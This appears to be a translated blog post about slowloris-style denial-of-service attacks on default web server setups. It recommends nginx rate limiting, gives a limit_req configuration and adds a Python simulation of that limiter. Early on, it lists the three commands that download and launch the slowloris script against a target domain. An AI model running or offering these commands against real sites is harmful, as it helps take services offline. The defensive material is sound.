
Children's HTTP DOS
Administrators often run LAMP in its out-of-the-box configuration. For personal home pages and test benches, this is not a big deal.
A full-fledged DDoS is not cheap for an attacker, and if someone has ordered an attack on your portal, you will have to find the resources to defend against it.
A children's DoS is much more dangerous, since anyone can carry out such an attack. All popular web servers are vulnerable in their initial configuration with empty firewall rules, and this applies to corporate portals, dedicated servers and VPSes: everything that is delivered but not configured. Mass hosting, as a rule, does not suffer from these childhood diseases.
On Debian-like systems, the attack takes 3 commands:
wget ha.ckers.org/slowloris/slowloris.pl
aptitude install libio-socket-ssl-perl
./slowloris.pl -dns domain.ru
If you have not already done so, put nginx on the frontend. Not only does it serve files faster and speed up the delivery of static content, it also gives the administrator a great deal of control, which Sysoev sometimes talks about on the mailing list.
Next, implement a limit on the number of requests to dynamic pages from one IP.
The configuration below allows 10 requests per second from one IP, with possible peaks of up to 30 requests. Young talents can test your resource for strength at the most inopportune moment, for example when you are on vacation. Do not put off setting up the protection.
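# http context: 10 MB zone keyed by client IP, 10 r/s; the location below belongs in a server block
limit_req_zone $binary_remote_addr zone=lphp:10m rate=10r/s;
location / {
    # bursts of up to 30 requests pass without delay; anything beyond that is rejected
    limit_req zone=lphp burst=30 nodelay;
}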
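
To see what rate=10r/s with burst=30 nodelay means for real traffic, here is an added example (not part of the original post and not nginx source code) that models the leaky-bucket accounting limit_req performs and replays constructed requests through it. The class and function names, the IP addresses and the traffic pattern are assumptions made for illustration.

```python
# Simplified model of nginx limit_req accounting (leaky bucket), not nginx source.
# Values from the page: rate=10r/s, burst=30, nodelay (accepted requests are
# served immediately, so only accept/reject needs modelling).
RATE_PER_SEC = 10
BURST = 30


class LimitReqZone:
    """Per-key bucket; 'excess' is counted in 1/1000 of a request."""

    def __init__(self, rate=RATE_PER_SEC, burst=BURST):
        self.rate = rate * 1000
        self.burst = burst * 1000
        self.state = {}  # key -> (excess, last_ms)

    def allow(self, key, now_ms):
        if key not in self.state:
            self.state[key] = (0, now_ms)
            return True
        excess, last = self.state[key]
        # Drain the bucket for the elapsed time, then add this request.
        drained = self.rate * (now_ms - last) // 1000
        excess = max(0, excess - drained + 1000)
        if excess > self.burst:
            return False  # rejected; the stored state is left unchanged
        self.state[key] = (excess, now_ms)
        return True


def replay(requests, zone=None):
    """requests: iterable of (time_ms, client_ip) -> {ip: [accepted, rejected]}."""
    zone = zone or LimitReqZone()
    totals = {}
    for now_ms, ip in sorted(requests):
        counts = totals.setdefault(ip, [0, 0])
        counts[0 if zone.allow(ip, now_ms) else 1] += 1
    return totals


# Constructed traffic: one client sends 200 requests in one second (every 5 ms),
# another browses at 2 requests per second for 5 seconds.
FLOOD = [(t * 5, "203.0.113.7") for t in range(200)]
NORMAL = [(t * 500, "198.51.100.20") for t in range(10)]

if __name__ == "__main__":
    for ip, (ok, rejected) in replay(FLOOD + NORMAL).items():
        print(f"{ip}: accepted={ok} rejected={rejected}")
```

In this model the flooding client gets 40 of its 200 requests through (the initial burst, then the steady 10 per second), while the client browsing at a normal pace is never limited.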